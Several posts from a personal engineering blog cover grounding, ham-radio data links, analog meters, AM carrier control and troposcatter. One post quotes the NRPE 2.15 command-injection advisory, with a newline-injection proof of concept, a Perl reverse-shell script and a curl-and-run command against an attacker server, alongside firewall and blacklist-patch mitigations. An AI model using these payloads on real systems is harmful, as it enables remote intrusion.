Grounding: Copper Strap vs Structural Steel - Kirby's Musings

In broadcast, multi-tenant, and microwave shelter design, it is desirable to prevent lightning from impacting operations. One way of doing this is by constructing a "halo" around the inside of the building at roof, wall, and/or floor level, or around the outside of the shelter or the entire equipment installation.

The fundamental nature of lightning is that of an effective DC pulse channeled through a single point of contact. Because lightning is essentially a large DC pulse like a square wave with a trailing edge, low-frequency AC pulses are induced in nearby wires and radiated when lightning strikes. This is what produces the characteristic "slope" on a spectrum analyzer of a lightning strike.

Since lightning is a static charge equalizing through a single point, it is easy to see that equalization over an area is the desired result of the strike. A tree gets blown to smithereens, but the charge dissipates and equalizes over the area around the strike -- both above and below the point of contact. Using good conductors, the magnitude of voltage across a given area is minimized. This lowered difference in potential prevents large voltages from appearing across equipment.

By running ground strap across the inside walls of the shelter around the perimeter at the ceiling, middle of wall, and floor levels, the lightning is given a path around the equipment instead of through the equipment. This prevents damage as high-resistance points in the equipment won't result in arc flashover due to high voltage across those points. This is not a Faraday cage, but works in a similar fashion. By giving lightning an alternative path of low resistance and impedance, the vast majority of the current goes around rather than through.

NEC compliance confuses this point, because traditional RF grounding for lightning and power grounding are somewhat at odds. Military manuals and Motorola's guide to R25 installation help. In some cases, the halo ground system has been implemented with the power ground opposite the tower coax window / ground panel. This allows NEC compliance with respect to the power ground, while putting a ground rod at the tower base and connecting the two together via 0000 to 2 AWG copper conductors.

At this point, we will discuss the merits of a copper ground halo above equipment versus using building steel and steel bolts.

A 4" copper ground strap 0.022" thick has a total cross section of 0.088 square inches, equating to a little larger than the cross-section of 0 AWG copper wire. 0 AWG copper wire has a resistance of 0.1 ohms per 1,000 ft. Thus, 1,000 feet of 4" 0.022" thick copper strap has a resistance of nearly 0.1 ohms.

A carbon steel wire 0.5" in diameter has a resistance of 0.00034 ohms per foot, or roughly .34 ohms per 1,000 ft. Thus, three 1/2" diameter bolts are nearly equal to 4" 0.022" thick copper strap assuming no other losses.

This calculation does not factor in the resistance of zinc at steel-zinc-zinc-steel junctions. However, one can see that with steel-on-steel contact under pressure, three or more (typically six) bolts are enough to allow the building steel to act as a halo, so a copper halo need not be installed as long as the building steel is attached to the ground system.

1" diameter carbon steel has a resistance of 9.0 x 10^-5 ohms per foot or .09 ohms per 1kft, so one can see why big towers often are not connected together with ground straps from section to section but smaller towers are.

It would be preferable to have the building steel sections welded together, or jumpers cadwelded around each joint.

100 KHz Data Channels - Kirby's Musings

In amateur radio we have 100 KHz wide data channels at a maximum of 19.2 kbaud (not kbit; kbaud indicates a symbol rate, not the actual data transferred or the binary serial data rate) at 222 MHz and above. However, very few radios actually support this data mode.

One approach to solve this problem is by using frequency-division multiplexing and inverse multiplexing. Inverse multiplexing separates a single high-speed serial data stream into a specific sequence of several slower serial data flows which pass over multiple data links of some form and are resequenced and combined at the opposite end of the link back into a high-speed data stream.

Using frequency-division multiplexing allows multiple voice channels to share a common group channel as if they were added up on the frequency axis. Six 300 - 4,000 Hz voice channels are stacked to create a 300 Hz - 24 KHz baseband voice group. That group, when applied to an FM modulator with a modulation index of 1, results in an occupied bandwidth of approximately 100 KHz as calculated by Carson's Rule (24 KHz + 24 KHz = 48 KHz; 48 KHz * 2 = 96 KHz). (FCC Part 97 states that modulation index may not be greater than one.)

By splitting the resistive hybrid combiners from an external V.90 or V.92 modem (33.6 K or 56 K), the modem can be duplexed to use a four-wire interface with a separate TX and RX audio pair instead of a two-wire interface with both RX and TX combined. By capturing the independent audio streams using sound cards or DSP, the streams can be combined into four or just with simple processing. The incoming audio is captured at 8,000 samples per second with an 8-bit sample depth. The audio is mixed / stacked / combined using simple processor math or DSP, resulting in an audio stream that extends from 300 Hz to 24 KHz. This is within the capabilities of 48 KHz or 96 KHz sound cards, and there are USB varieties of each today. The resulting combined audio stream is applied directly to the modulator of a radio, creating the 100 KHz wide modulated signal. To receive the signal, one need only remove the IF filters from the FM radio and replace the 20 KHz filters with 100 KHz filters. The modulator may require specific modifications; some PLL loops operate at 50 KHz and may be incapable of handling the broad bandwidth.

The reason why 0-300 Hz is not used is to prevent issues with DC coupling in the modulator or demodulator. This also allows for introducing a low-frequency signaling component or clock synchronization carrier without introducing large amounts of AM, FM, and/or PM interference of any combination thereof.

The V.90 modem has a carrier frequency of 3429 Hz and runs at QAM256, encoding eight bits of information per resulting symbol. The V.90 and V.92 modem cores do not exist in an open-source format and contain related patents. Therefore, this is a circumstance where the modem function is effectively offloaded to dedicated hardware.

Combining the data flows from the six modems requires a form of inverse multiplexing. Rather than re-engineer and re-implement this in a format specific to this application, one may use Multilink PPP to effectively manage the modems and modem connectivity as well as perform frame disassembly and assembly.

Since digital switching is not involved, it is not possible to achieve 56 K or 64 K data rates. Instead, the maximum analog rate is the limit at 33.6 kbit/s per modem. This aggregates to 201.6 kbit/s, with one byte per modem being sent per symbol transmitted, (i.e.: 3429 * 6 = 20574 but the actual baud rate is 3429 Hz). Six bytes are transmitted per symbol time aggregated across all modems.

If one transmitter is located at 420.050 and another further up the band at 446.550 MHz, then duplexing may be possible without using cavity filters.


Why Analog Meters? - Kirby's Musings

Why should I use analog meters?

  • Require no batteries
  • Can be left in circuit at all times
  • Instant or continuous reading/observation
  • Range can be set by configuration/specification/design

Analog meters may be used for a number of applications for measuring volts, amps, watts, ohms, etc. The biggest advantage is that one need not replace batteries to continue to observe electrical conditions.

Protection

In the case of voltmeters, one can protect the meter by using zener diodes. The range in a voltmeter is set by the coil resistance, as well as the multiplier or ballast resistor.

For ammeters, a pair of Schottky diodes wired back to back will protect the meter movement from large swings, with the hazard being that a 50 or 75 mV Full-Scale Deflection (FSD) meter movement may experience 300-400 mV as the diode starts to conduct, effectively acting like a zener diode.

  • Caveat: Ammeter shunts must be designed or rated for continuous-duty use to remain in circuit all the time.

A standard shunt is only designed for 66% of the continuous-duty power dissipation requirements. To maintain the resistance rating, a larger shunt must be used that provides the same resistance over the desired range. One may calculate the range based on comparing 50 mV shunts to 75 mV shunts and lining up the resistance to power ratings.

50 mV is 66% of 75 mV; a 75 A 75 mV shunt produces 50 mV at 66% of the rated current (75 A x 66% = 49.5 A). Thus, a 75 A 75 mV intermittent-duty shunt is also a 50 mV 50 A continuous-duty shunt (plus or minus a few percent).

To protect either in the case or situation of induced RF, liberal use of Schottky diodes and/or 10 - 1000 nF (0.01 uF, 0.1 uF, and 1 uF) capacitors will effectively short out the AC component.

A secondary caveat to using analog meters is that they are not known for accuracy; common meters were +/- 3% accurate, while high-accuracy meters were often +/- 1% accurate. Digital meters are far more accurate, but with accuracy come costs, and external power requirements.

IP Allocation Plan for AMPRNet Alabama - Kirby's Musings

This is my plan for IP Allocation in 44.100.0.0/16 for the Alabama section of AMPRNet:

V1.0:
44.100.0.0 - 44.100.7.255 /21 Backbone networking projects (statewide infrastructure, servers, DNS, DHCP, WWW, etc.)

44.100.8.0 - 44.100.9.255 2x /24: /30s and /31s for fixed links on an individual coordination basis.

44.100.9.0/30 - KK5VD (/28 actual for four links)
44.100.9.4/30 - KK5VD
44.100.9.8/30 - KK5VD
44.100.9.12/30 - KK5VD
44.100.9.16/30 - unallocated

44.100.16.0 - individual allocations as necessary (/24s, etc. start here)

44.100.42.0/24 Allocated N4BWP
44.100.47.0/24 Allocated Madison County Area.

44.100.128.0 /18 Statewide Mesh, OLSR, etc. Individual IPs defined per hostname or IP or request. Netmask: 255.255.192.0


V2.0:
44.100.0.0/24: backbone services space
44.100.1-67/24: one /24 per county.
44.100.68-96: additional networks as needed, such as metro-area links
44.100.97-127: filled from the highest to lowest for point-to-point links, i.e.: 44.100.127.252-255/32
44.100.192-223/19: Mesh space - may be expanded to 44.100.128 and/or 44.100.255.

All of this keeps in mind that RF doesn't respect county boundaries, and there may be more than 252 people using IP in a given county.

Disable Auto-Play On Import in iTunes - Kirby's Musings

From the "Who thought this was a good idea?" Dept.:

How to disable auto-play on import in iTunes:

Open a Terminal.App window and paste this in:

defaults write com.apple.iTunes play-songs-while-importing -bool FALSE

That's all.

AM Transmitter Efficiency Improvement - Kirby's Musings

A carrier control system is sweeping AM radio stations now as AM stations rush to save power. Craig Kopcho says this of his experience:

This is a power saving gizmo that I installed in WOKV's night-time transmitter. It is set for a minus 3 dB dip in carrier and modulation power during periods of peak modulation. You can actually see the power drop with modulation. Now this goes against everything that I have been taught but I notice no degradation in coverage or loudness with the carrier control system working. The advantage of doing this is an overall reduction in power consumption. Again I have been where the signal is almost non-existing and remotely switched this system on and off and I cannot hear the difference. It should be noted that we have been granted permission from the FCC to not conform to traditional carrier shift requirements. The video was shot with the transmitter looking into the dummy load. https://www.youtube.com/watch?v=FARdE7_8bQM
Tom Ray corrects:

Your paragraph... ...is a little misleading. The power in the sidebands doesn't change from full carrier operation - so the modulation power is the same. It's the carrier that drops. And, be honest. When you put it on the air, and first saw the common point meter drop, you thought you had to fix something. That was my reaction.

"Everything old is new again," except there is nothing new here, save for the implementation. The technique originates in AM-compatible SSB and/or DSB with a suppressed carrier (DSB-SC). Dynamic Carrier Control has been around for a while, but real-time conversion from pure AM (even with DCC enabled) to DSB-SC is resulting in lowered power bills significantly (Tom Ray reported consistently measuring a 34% reduction in power consumption with a Harris 3DX50 transmitter, equating to about 23% savings for the entire site after including HVAC savings).

The short explanation of this phenomenon is that the carrier itself is being amplitude modulated prior to mixing or modulation when modulation is maximized. In this way, the implementation is more like AM times AM, or AM squared. It effectively behaves as if one placed a variable attenuator in the RF line and turned down the RF drive level as the modulation level approached maximum modulation. The drive level is returned to normal as the transmitter recovers from the modulation peak.

Historical AM transmitters, like WLW's 500 kW station, required large amounts of power to modulate the plate supply. The modulation power at audio frequencies is fed into a transformer installed between the DC power supply and the RF amplifier tubes, and the resulting added or subtracted power effectively turns the carrier on and off on a continuously variable basis up to the limits of transformer core saturation, producing the modulation sidebands around the carrier as the constant carrier is modulated in amplitude by the combination of the two powers. As the transformer approaches saturation, it acts like a reactor or a variable choke, limiting the transfer of power to the final amplifier. This is how 90-100% modulation is achieved: by pinching off the RF PA's power supply. Old fashioned, but it works.

The above technique is being rediscovered as the Class G amplifier, where the power supply bus rails and transistor biases are switched from several operating voltages, i.e.: -50, -25, -15, -7, -3.5 V and 3.5, 7, 15, 25, 50 V. The amplifier is kept operating as a Class-C amplifier at the different power levels and switched to the next range as more power is needed. Basically, a 150 W transistor (i.e.: 2N3055) is being used as a 100 mW (2N2222 or 2N3904 for the new kids), 1 W, 5 W, or 25W transistor when necessary.  

A two-way FM radio rated for 110W was sometimes rated by the manufacturer for 55W to 110W continuously variable -- that is, the power may be set to any level in that range and left there. The efficiency of the final (Class C) amplifier varies considerably through that range, and at power levels below 80%, may be less efficient than at higher power levels due to the fixed transistor bias levels. Those fixed bias levels cause the transistor to conduct longer at lower power levels, effectively reducing the "pulse like" behavior of a Class C amplifier -- conducting less than 50% of the time, approximately 120 degrees of the 360 degrees in a sine wave (33%) --  into a Class B amplifier, conducting 180 or less degrees (50%) and if bias is set high enough, into a Class AB amplifier, conducting 360 to 180 degrees of the cycle. Here I express conduction angle backwards, since we are moving from more efficient to less efficient as transistor bias voltage goes up and the transistor conducts more and more of the time it takes the sine wave to go through the cycle. That conduction time is being expressed in degrees of a 360 degree circle -- a sine wave may also be expressed as a circle, but that's calculus, vectors, and a whole lot of math.

What DSB-SC is doing is amplitude modulating the RF carrier drive to the final amplifier so that as peak modulation is approached, the RF drive is minimized. The resulting total peak power demand on the final amplifier goes down but the effective signal does not because the carrier is suppressed, reducing the amount of power required to amplify the combined lower and upper sidebands and the carrier.

From http://www.w8ji.com/amplitude_modulation.htm:

(If) Unmodulated carrier = 100 watts (PEP or) average carrier power.

Average is the same as PEP because, absent amplitude modulation, the carrier level is unchanging over time.

100% steady modulated 100 w carrier = 400 watts PEP or 150 watts average or "heating" power. Of this 150 watts average or "heating" power, 100 watts is in the carrier, and 25 watts average power is in each of the two AM signal's sidebands.

Carrier average power = 2/3 of the total 100% modulated average power

Total of both sidebands, average power = 1/3 of total average power under 100% modulation

Average power one sideband = 1/6th average power with 100% modulation

Peak Envelope Power 100% symmetrical modulation = Four times carrier power
As the carrier power is dynamically adjusted lower as modulation power increases, the total power required will flatten out, thus allowing an amplifier of a given size to effectively produce a signal as well as a conventional "pure AM" transmitter. One would think the CB radio guys would have figured this out a decade or two ago to get "more power" from a 4W AM or 12W SSB radio. DSB-SC, one would find the power level somewhere between those two numbers, but that's another story entirely.
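As an added derivation (mine, not from the w8ji page quoted above), the figures above follow from the standard AM envelope with carrier amplitude $A_c$ and modulation index $m$, taking a $1\,\Omega$ load so that power is $\tfrac{1}{2}(\text{amplitude})^2$:

$$s(t) = A_c\,[1 + m\cos(\omega_m t)]\cos(\omega_c t) = A_c\cos(\omega_c t) + \frac{mA_c}{2}\cos\big((\omega_c+\omega_m)t\big) + \frac{mA_c}{2}\cos\big((\omega_c-\omega_m)t\big)$$

$$P_c = \frac{A_c^2}{2}, \qquad P_{\mathrm{USB}} = P_{\mathrm{LSB}} = \frac{1}{2}\left(\frac{mA_c}{2}\right)^2 = \frac{m^2}{4}P_c, \qquad P_{\mathrm{avg}} = P_c\left(1 + \frac{m^2}{2}\right)$$

$$P_{\mathrm{PEP}} = \frac{\big[A_c(1+m)\big]^2}{2} = (1+m)^2\,P_c$$

With $m = 1$ and $P_c = 100$ W: $P_{\mathrm{avg}} = 150$ W, each sideband carries $25$ W, and $P_{\mathrm{PEP}} = 400$ W, so the carrier is $\tfrac{2}{3}$ of the average power, both sidebands together $\tfrac{1}{3}$, and each sideband $\tfrac{1}{6}$.

The carrier-control case discussed above is the same algebra with the carrier amplitude scaled by a factor $k$ while the sideband amplitudes $\tfrac{mA_c}{2}$ are left alone (which is Tom Ray's point that sideband power does not change):

$$P_{\mathrm{avg}} = k^2 P_c + \frac{m^2}{2}P_c, \qquad P_{\mathrm{PEP}} = (k + m)^2\,P_c$$

For the $-3$ dB carrier dip at peak modulation ($k = 1/\sqrt{2}$, $m = 1$, $P_c = 100$ W): $P_{\mathrm{avg}} = 50 + 50 = 100$ W instead of 150 W, and $P_{\mathrm{PEP}} \approx (1.707)^2 \times 100 \approx 291$ W instead of 400 W, with the 50 W of sideband power unchanged.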

NRPE Exploit and Solution - Kirby's Musings

I don't often get on my soapbox, but this has gone on too long without resolution.

1. 4/20/2014, this was posted:

http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability

Recently, news emerged about a 'vulnerability' in Nagios's NRPE 'agent' - http://1337day.com/exploit/22156

Essentially, you can use it to write files or items to /tmp (or any 'write all' directory ('777')) as below:

nagios@nagios-server:/usr/local/nagios/libexec# /usr/local/nagios/libexec/check_nrpe  -H myServer -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
root@nagios-server:/usr/local/nagios/libexec#
Then if you look on your 'monitored server', you'll see:

root@myServer:/proc# cd /tmp/
root@myServer:/tmp# ls -la
total 24
drwxrwxrwt 4 root root 4096 Apr 20 20:24 .
drwxr-xr-x 22 root root 4096 Apr 18 10:30 ..
-rw-r--r-- 1 nagios nagios 0 Apr 20 20:25 vulntest
root@myServer:/tmp#
This isn't best - as, has been seen, some pretty bad people can use this to put all kinds of bitcoin mining rubbish on there, amongst other things. Now, this only works because /tmp is writable to everyone (even on my test server, see below):

root@server:/# ls -la | grep tmp
drwxrwxrwt 4 root root 4096 Apr 20 20:24 tmp
root@server:/#
So - answer number 1 - secure it! Now, if you're savvy and use a config management tool like Puppet, Chef, Ansible etc then you can do this en-masse. For me, I've only got the one test server, so I just edited /etc/fstab:

/dev/sda7 /tmp ext3 nosuid,noexec,nodev,rw 0 0

This stops executables running from /tmp, nor any suid programs (more information here: http://www.techrepublic.com/blog/linux-and-open-source/secure-temporary-files-in-linux/171/).

Next step - answer number 2 - secure your boxes with a firewall. NRPE agents should ONLY be accessible from the Nagios monitoring server. The simplest way is to use iptables on the box:

iptables -I INPUT 2 -s 192.168.200.201 -p tcp --dport 5666 -j ACCEPT
And reject NRPE from any other server. This means, only your Nagios server can access the box via 5666 - so, unless your monitoring server gets compromised - you should be in good shape.

So - /tmp isn't writable, and no-one can run check_nrpe against the box except your monitoring server.

Finally - look at SELinux if you're using RHEL/Centos and the likes, and also look at this guide here: http://nagios.sourceforge.net/docs/3_0/security.html

At the end of the day, your network is only as secure as you make it - therefore I'd recommend a review of who can access your internal networks, HOW they got access (Firewalls, NAT, etc) and a review of your IPS/IDS if you are experiencing this issue.

Also - this may be of interest in the future - check_by_ssh - http://www.techrepublic.com/blog/linux-and-open-source/remotely-monitor-servers-with-the-nagios-check-by-ssh-plugin/

We are currently looking at a patch for this issue in the coming days, so stay tuned to Twitter/Opsview forums for more on this issue.

Sam Marsh
Product Manager
Opsview


2. From http://1337day.com/exploit/22156
NRPE <= 2.15 - Remote Command Execution Vulnerability, 4/19/2014:

I. VULNERABILITY
-------------------------
 
NRPE - Nagios Remote Plugin Executor  <= 2.15 Remote Command Execution
 
  
II. BACKGROUND
-------------------------
 
Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
 
The NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to
execute Nagios plugins on remote Linux/Unix machines.
The main reason for doing this is to allow Nagios to monitor "local" resources
(like CPU load, memory usage, etc.) on remote machines. Since these public
resources are not usually exposed to external machines, an agent like NRPE must
be installed on the remote Linux/Unix machines.
 
 
  
III. INTRODUCTION
-------------------------
 
Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could
allow an attacker to remotely inject and execute arbitrary code on the host
under NRPE account (typically 'nagios').
The vulnerability is due to NRPE not properly sanitizing user input before
passing it to a command shell as a part of a configured command.
In order for an attacker to take advantage of the host NRPE must be compiled
and configured with command arguments.
No authentication is required to exploit this vulnerability if the NRPE port
has not been protected with a firewall.
 
IV. DESCRIPTION
-------------------------
  
 
NRPE expects definitions of commands in nrpe.cfg config file. Some of the
examples given in the config with hardcoded arguments are:
 
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1
 
When command arguments are enabled, the user is also allowed to define
commands with variables like:
 
command[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$
command[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
 
This is often suggested for convenience in various nagios/nrpe setup tutorials
on the web.
 
 
To get a result from a defined command in NRPE daemon the following nrpe client
can be used with -a option that passes arguments:
 
# /usr/local/nagios/libexec/check_nrpe  -H 10.10.10.5 -c check_users -a 4 4
 
USERS OK - 4 users currently logged in |users=4;4;4;0
 
 
in case check_users command was defined with arguments as shown above
NRPE would execute:
 
/usr/local/nagios/libexec/check_users -w 4 -c 4
 
on the local system.
 
 
As we can find in the source code of nrpe-2.15/src/nrpe.c NRPE daemon uses popen() function for
command execution:
 
/* executes a system command via popen(), but protects against timeouts */
int my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){
----cut----
                /* run the command */
                fp=popen(command,"r");
 
 
using popen() results in the command being executed with the help of a command shell.
 
Before this function is reached however NRPE takes several measures to prevent
malicious command injection to the shell. That includes filtration based on a blacklist:
 
#define NASTY_METACHARS         "|`&><'\"\\[]{};"
 
/* make sure request doesn't contain nasties */
if(contains_nasty_metachars(pkt->buffer)==TRUE){
    syslog(LOG_ERR,"Error: Request contained illegal metachars!");
 
that prevents bash special characters like semicolon, pipe etc.
 
The code is also making sure that arguments do not contain bash command substitution
i.e. $(ps aux)
 
if(strstr(macro_argv[x],"$(")) {
    syslog(LOG_ERR,"Error: Request contained a bash command substitution!");
    return ERROR;
 
 
Despite these checks the code is vulnerable to command injection as bash shell allows
for multiple command execution if commands are separated by a new line.
None of the checks examines the arguments for an occurrence of a new line character: 0x0A
 
  
V. PROOF OF CONCEPT
-------------------------
  
To execute an arbitrary command an attacker could simply add a new line character after
a parameter and follow it with his own command.
 
To run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments:
 
# /usr/local/nagios/libexec/check_nrpe  -H 10.10.10.5 -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
 
which makes the NRPE daemon run the following series of commands:
 
/usr/local/nagios/libexec/check_users -w <new_line>
touch /tmp/vulntest
# -c 4
 
and a file /tmp/vulntest would be created with the nagios user as the owner. The hash character is to comment
out the rest of the arguments.
 
 
An attacker gets a limited set of commands as most of the metacharacters are prohibited by the
blacklist. So for example it's difficult to create new files in the system without using > symbol etc.
 
An attacker could however download a snippet of perl/python etc. code from the web by using wget or
curl command and get a reverse shell. This would allow unrestricted access to the command line:
 
---------[revshell.pl on attackers-server]---------
 
#!/usr/bin/perl
 
use Socket;
 
#attackers ip to connect back to
$i="10.10.10.40";
 
$p=8080;
 
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 
if(connect(S,sockaddr_in($p,inet_aton($i))))
 
{
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
}
--------------------------------------------------
 
/usr/local/nagios/libexec/check_nrpe  -H 10.10.10.5 -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 "
 
 
 
[attacker@10.10.10.40 ]# nc -v -l 8080
Connection from 10.10.10.5 port 8080 [tcp/ddi-tcp-1] accepted
sh-4.1$ id
uid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd)
sh-4.1$
sh-4.1$ cat /etc/passwd | head -n 4 ; pwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
/
sh-4.1$ ls -l /tmp/tmp_revshell
-rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell
sh-4.1$ rm -f /tmp/tmp_revshell
 
 
 
VI. BUSINESS IMPACT
-------------------------
 
An attacker could exploit the vulnerability to gain access to the system
in the context of the nagios user; this could lead to further compromise
of the server.
  
VII. SYSTEMS AFFECTED
-------------------------
 
Current version of NRPE 2.15 and older are vulnerable.
  
VIII. SOLUTION
-------------------------
 
Disable command arguments if possible.
Protect access to NRPE port and only allow access from a trusted
nagios server.
Install updated version of NRPE when it becomes available.
  
IX. REFERENCES
-------------------------
 
http://www.nagios.org
http://sourceforge.net/projects/nagios/files/nrpe-2.x/
http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details
http://legalhackers.com/advisories/nagios-nrpe.txt

# F8888C01AE0BB66C   1337day.com [2014-07-24]   4F480D1B5D7C5F9D #
3. From http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details :

Current Version
2.15
Last Release Date
2013-09-06
Compatible With
  • Nagios 1.x
  • Nagios 2.x
  • Nagios 3.x

4. Yes, so that's V2.15, released on 09-06-2013, found sploitable on 4-19-2014, responded to on 4-20-2014... and not fixed by 07-29-2014.

I've written my own patch and applied it to systems I work on:

#define NASTY_METACHARS         "\x7c\x60\x26\x3e\x3c\x27\x22\x24\x5c\x5b\x5d\x7b\x7d\x28\x29\x3b\x2a\x0a\x0d\x0f\x3f\x2e"
/*
 *  Nasty characters as defined by kirby, all written as hex escapes
 *  from the ASCII chart so nothing needs quoting inside the string:
 *  pipe, backtick, ampersand, greater-than, less-than,
 *  single quote, double quote, dollar sign, backslash, brackets,
 *  curly braces, parentheses, semicolon, asterisk,
 *  line feed (\x0a), carriage return (\x0d), shift-in (\x0f),
 *  question mark, period.
 *
 *  The rest of the control range \x01 (start of heading) through
 *  \x1f (unit separator) and delete (\x7f) are skipped here.
 *  \x04 is EOF; exclude \! because it's the separator.
 */

The fact that this issue has been unaddressed for three months and it is one of the central daemons to Nagios is reprehensible. Additionally, the initial text of the #define given includes a second error in it: an unescaped single quote. I sidestepped the escape issue by declaring them all as hexadecimal from the ASCII chart. This speaks of three glaring problems: 1) no code review, 2) no code testing, and 3) no actual security testing or analysis.
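To make the difference between the shipped blacklist and the hex-escaped list above concrete, here is an added C check (my own code, not NRPE's and not Kirby's patch) that runs the original filter, the patched filter, and an allowlist alternative over constructed argument strings, including the newline payload quoted in the advisory. The helper names, the use of strcspn/strspn, and the allowlist character set are my assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Blacklist as shipped in nrpe-2.15 (quoted in the advisory above). */
#define NASTY_METACHARS_ORIG    "|`&><'\"\\[]{};"

/* Kirby's hex-escaped list from the patch above (adds $, (, ), *, LF, CR, ...). */
#define NASTY_METACHARS_PATCHED "\x7c\x60\x26\x3e\x3c\x27\x22\x24\x5c\x5b\x5d\x7b\x7d\x28\x29\x3b\x2a\x0a\x0d\x0f\x3f\x2e"

/* True if any byte of s appears in blacklist. strcspn() returns the length of
   the prefix of s containing no blacklisted byte; if that prefix ends before
   the terminator, a blacklisted byte is present. */
static bool contains_nasty(const char *s, const char *blacklist)
{
    return s[strcspn(s, blacklist)] != '\0';
}

/* Mirror of the two separate checks the advisory describes in nrpe.c: the
   metachar scan, then a strstr() for bash command substitution "$(". */
static bool nrpe_original_rejects(const char *arg)
{
    if (contains_nasty(arg, NASTY_METACHARS_ORIG))
        return true;
    return strstr(arg, "$(") != NULL;
}

/* Same scan using the patched list; 0x0a is now in the set. */
static bool nrpe_patched_rejects(const char *arg)
{
    return contains_nasty(arg, NASTY_METACHARS_PATCHED);
}

/* Allowlist alternative (assumed, not NRPE's code): accept only the bytes
   that plugin arguments on this page actually use (digits, letters, ",",
   "%", "/", "." and "-") and refuse everything else, so every control byte
   is rejected without having to enumerate it. */
static bool allowlist_rejects(const char *arg)
{
    static const char ok[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
        "0123456789 ,.:/%_=+-";
    return arg[strspn(arg, ok)] != '\0';
}

int main(void)
{
    /* Constructed samples: the first four are shapes seen on this page. */
    const char *samples[] = {
        "4",                          /* check_users -w 4 -c 4            */
        "15,10,5",                    /* check_load thresholds            */
        "/dev/hda1",                  /* check_disk -p argument           */
        "\n touch /tmp/vulntest #",   /* the newline injection            */
        "$(id)",                      /* caught by the strstr() check     */
        "a;b",                        /* caught by both blacklists        */
        "1.5",                        /* period: rejected by patched list */
    };
    size_t n = sizeof samples / sizeof samples[0];

    printf("%-28s %-9s %-9s %-9s\n", "argument", "orig", "patched", "allow");
    for (size_t i = 0; i < n; i++) {
        /* Show the newline visibly in the table. */
        char shown[40];
        size_t j = 0;
        for (const char *p = samples[i]; *p && j < sizeof shown - 3; p++) {
            if (*p == '\n') { shown[j++] = '\\'; shown[j++] = 'n'; }
            else            { shown[j++] = *p; }
        }
        shown[j] = '\0';
        printf("%-28s %-9s %-9s %-9s\n", shown,
               nrpe_original_rejects(samples[i]) ? "REJECT" : "pass",
               nrpe_patched_rejects(samples[i])  ? "REJECT" : "pass",
               allowlist_rejects(samples[i])     ? "REJECT" : "pass");
    }
    return 0;
}
```

The table shows the original list passing the newline payload while both the patched list and the allowlist reject it; it also shows the cost of blacklisting the period, which the patched list pays for arguments such as "1.5".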

While Sam Marsh is right, that the daemon should be firewalled off from all hosts except for the intended target / host, the fact that this is considered as a remedial measure is also unacceptable. Security should be through defense in depth, not a hurried response to the crisis of the day. Security should be involved from the very beginning, particularly where network communications are involved.

The fact that this product is being sold for money means that at the very least, a gaping hole like this should be addressed post-haste.

Ham Radio's Next Retro Frontier: Tropo - Kirby's Musings

While recently reading about the AN/TRC-170, it occurred to me that it is more than possible for amateur radio operators to use this technology much like they do Near Vertical Incident Skywave (NVIS) propagation over HF radio.

Wikipedia page on Troposcatter Communications.

Basically, Ma Bell and the military used this technology to talk around the world mostly reliably. The old systems used 1 to 10kW klystrons and massive antennas (40dB to 60 dB at 2GHz, or bigger than your average billboard), between 345 - 988 MHz, 1.7 - 2.1 GHz, and 4.4 - 5.0 GHz.  (Communications and Information Systems, by Michael John Ryan, Michael Frater)
Rough calculations figure that the systems only transmitted a signal about 128 KHz wide (32 channels at 4 KHz, SSB being the most common mode over microwave). Selective fading over distance caused noise, so the systems often used double or quadruple diversity (space and polarization) to mitigate it and assure link quality. Documentation by Bell Labs indicates that FDM signals were used to FM modulate a carrier, which resulted in less noise but required higher transmitter power.

One factor of troposcatter is that the systems need an unobstructed view of the horizon. This may be difficult to arrange, and existing communications systems in the main lobe of the antenna may be negatively affected, requiring immediate mitigation.

The AN/TRC-170's klystron amplifier has a minimum power output of 2 kW between 4.4 - 5.0 GHz and the set is typically equipped with two six foot or ten foot dishes. It is capable of full-duplex operation, and can transmit about 16 Mbit/s of data over 3.5 to 7.0 MHz (QAM or QPSK, two bits per point in the constellation). Armchair calculation suggests that it is likely a QPSK signal with 7/8 FEC; the occupied bandwidth is 3.4 MHz, which matches up with some Reed-Solomon thrown into the mix. (QPSK at 4 MHz results in an occupied spectrum of 2 MHz, and line codes increase the link speed required, such as how 8b10b turns 100 Mbit/s of data into 125 MHz of physical link.)

The AN/TRC-170(V) is capable of providing connectivity to a mixture of up to 32 analog (includes FSK), or digital, local subscriber channels and up to 4 TRI-TAC Digital Trunk Groups (DTG). A single TRI-TAC group consisting of up to 144 subscriber loops (2304 KB/s or 4608 KB/s) can be configured to operate using external equipment vans to provide the high data rate DTG.

This system is probably capable of operating at extremely low Eb/N0; it looks like the minimum for this mode is 6 to 9 dB.

Tropo link calculator: http://www.bobatkins.com/radio/scatter2.html

Amateur use of this technology can be fulfilled as follows:

